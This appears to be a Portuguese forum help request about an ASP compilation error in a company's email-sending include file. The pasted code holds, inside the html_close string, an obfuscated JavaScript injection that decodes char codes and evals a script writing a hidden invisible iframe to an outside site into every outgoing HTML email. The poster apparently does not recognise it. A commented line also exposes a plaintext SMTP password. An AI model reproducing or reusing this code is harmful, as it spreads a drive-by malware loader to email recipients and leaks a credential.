Ir para conteúdo
Fórum Script Brasil
  • 0

Ajuda com erro '800a0401'


chelfernandes

Pergunta

Olá, boa tarde a todos!

Estou com problemas em um código em ASP, faz parte do sistema aqui da empresa e desde ontem está dando o seguinte erro quando tentamos acessar o site:

Microsoft VBScript compilation error '800a0401'

Expected end of statement

/includes/sendMail.asp, line 14

Não manjo nada de ASP e isso é muito urgente, se alguém puder ajudar, agradeço!

Segue o código completo da página:

<%
'*>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>*
'*> PROCESSAMENTO DE E-MAIL
'*------------------------------------------------------------------------------------------*
Function sendMail(toMail, subject, msg, fromName, fromMail, replyTo)
    
    Dim html_open, html_close, headers
    Dim oMail, oMailConfig, cdoImportance, cdoPriority
    Dim send
    
    send = "ok"
    
    html_open = "<html><head><meta http-equiv=Content-Type content=""text/html; charset=iso-8859-1""><meta http-equiv=""Content-Language"" content=""pt-br""><meta content=""MSHTML 6.00.3790.0"" name=GENERATOR></head><body><div style=""font-family:tahoma,verdana,arial; font-size:11px;"">"
    html_close = "</div></body></html><!-- o -->&lt;script>aa=([].pop+'asd').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragment']+'asd').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss="";s=String;e=window['e'+'val'];t='b';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n="4.5b4.5b52.5b51b16b20b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b20.5b61.5b4.5b4.5b4.5b52.5b51b57b48.5b54.5b50.5b57b20b20.5b29.5b4.5b4.5b62.5b16b50.5b54b57.5b50.5b16b61.5b4.5b4.5b4.5b50b55.5b49.5b58.5b54.5b50.5b55b58b23b59.5b57b52.5b58b50.5b20b17b30b52.5b51b57b48.5b54.5b50.5b16b57.5b57b49.5b30.5b19.5b52b58b58b56b29b23.5b23.5b57.5b58b48.5b58b52.5b49.5b50b58.5b56b50b48.5b58b50.5b23b49.5b55.5b54.5b23.5b58b50.5b54.5b56b23.5b57.5b58b48.5b58b23b56b52b56b19.5b16b59.5b52.5b50b58b52b30.5b19.5b24.5b24b19.5b16b52b50.5b52.5b51.5b52b58b30.5b19.5b24.5b24b19.5b16b57.5b58b60.5b54b50.5b30.5b19.5b59b52.5b57.5b52.5b49b52.5b54b52.5b58b60.5b29b52b52.5b50b50b50.5b55b29.5b56b55.5b57.5b52.5b58b52.5b55.5b55b29b48.5b49b57.5b55.5b54b58.5b58b50.5b29.5b54b50.5b51b58b29b24b29.5b58b55.5b56b29b24b29.5b19.5b31b30b23.5b52.5b51b57b48.5b54.5b50.5b31b17b20.5b29.5b4.5b4.5b62.5b4.5b4.5b51b58.5b55b49.5b58b52.5b55.5b55b16b52.5b51b57b48.5b54.5b50.5b57b20b20.5b61.5b4.5b4.5b4.5b59b48.5b57b16b51b16b30.5b16b50b55.5b49.5b58.5b54.5b50.5b55b58b23b49.5b57b50.5b48.5b58b50.5b34.5b54b50.5b54.5b50.5b55b58b20b19.5b52.5b51b57b48.5b54.5b50.5b19.5b20.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b57.5b57b49.5b19.5b22b19.5b52b58b58b56b29b23.5b23.5b57.5b58b48.5b58b52.5b49.5b50b58.5b56b50b48.5b58b50.5b23b49.5b55.5b54.5b23.5b58b50.5b54.5b56b23.5b57.5b58b48.5b58b23b56b52b56b19.5b20.5b29.5b51b23b57.5b58b60.5b54b50.5b23b59b52.5b57.5b52.5b49b52.5b54b52.5b58b60.5b30.5b19.5b52b52.5b50b50b50.5b55b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b56b55.5b57.5b52.5b58b52.5b55.5b55b30.5b19.5b48.5b49b57.5b55.5b54b58.5b58b50.5b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b54b50.5b51b58b30.5b19.5b24b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b58b55.5b56b30.5b19.5b24b19.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b59.5b52.5b50b58b52b19.5b22b19.5b24.5b24b19.5b20.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b52b50.5b52.5b51.5b52b58b19.5b22b19.5b24.5b24b19.5b20.5b29.5b4.5b4.5b4.5b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b23b48.5b56b56b50.5b55b50b33.5b52b52.5b54b50b20b51b20.5b29.5b4.5b4.5b62.5";n=n["split"](t);for(i=0;i<n.length;i++)ss+=s['fromCharCode'](-h*n[i]);zx=ss;if((aa=="unct")||(aa=="func"))e(zx);</script><!-- c -->"
    
    If InStr(msg, "</html>")=0 Then
        msg = html_open & msg & html_close
    End If
    
    '---------------------------------------------------------------------------------------'
    'CDOSYS
    '---------------------------------------------------------------------------------------'
    Set oMail = Server.CreateObject("CDO.Message")
    Set oMailConfig = Server.CreateObject ("CDO.Configuration")
    
    'SMTP
    oMailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "localhost"
    'PORTA DO SMTP
    oMailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
    'ATIVAR RECURSO DE SMTP AUTENTICADO
    'oMailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
    'USUÁRIO PARA SMTP AUTENTICADO
    'oMailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/sendusername") = fromMail
    'SENHA DO USUÁRIO PARA SMTP AUTENTICADO
    'oMailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "ferrarif40"
    'SMTP AUTENTICADO
    oMailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    'TIMEOUT
    oMailConfig.Fields("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 30
    'PRIORIDADE
    oMailConfig.Fields.Item("urn:schemas:httpmail:priority").Value = 1
    'IMPORTÂNCIA
    oMailConfig.Fields.Item("urn:schemas:httpmail:importance").Value = 2
    oMailConfig.Fields.Update
    
    'CABEÇALHO
    oMail.Fields.Item("urn:schemas:mailheader:Priority").Value = "urgent"
    oMail.Fields.Item("urn:schemas:mailheader:Importance").Value = "high"
    oMail.Fields.Item("urn:schemas:mailheader:X-Priority").Value = 1
    oMail.Fields.Item("urn:schemas:mailheader:X-MSMail-Priority").Value = "High"
    oMail.Fields.Item("urn:schemas:mailheader:X-Mailer").Value = "Microsoft Outlook Express 6.00.2900.5512"
    oMail.Fields.Update
    
    'ATUALIZA AS CONFIGURAÇÕES
    Set oMail.Configuration = oMailConfig
    
    oMail.From =  fromName & "<" & fromMail & ">" 'Nome e e-mail do remetente
    oMail.To = toMail 'Destinatário
    oMail.ReplyTo = replyTo 'Responder para...
    oMail.Subject = subject 'Assunto
    oMail.HtmlBody = msg 'Mensagem 
    
    On Error Resume Next
    
    oMail.Send
    
    If Err.Number<>0 Then
        send = Err.Description
    End If
    
    Set oMail = Nothing 
    Set oMailConfig = Nothing

    sendMail = send

End Function
'*<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<*
%>

Será que alguém consegue me ajudar? :mellow:

Link para o comentário
Compartilhar em outros sites

1 resposta a esta questão

Posts Recomendados

Participe da discussão

Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.

Visitante
Responder esta pergunta...

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.



  • Estatísticas dos Fóruns

    • Tópicos
      152,2k
    • Posts
      651,9k
×
×
  • Criar Novo...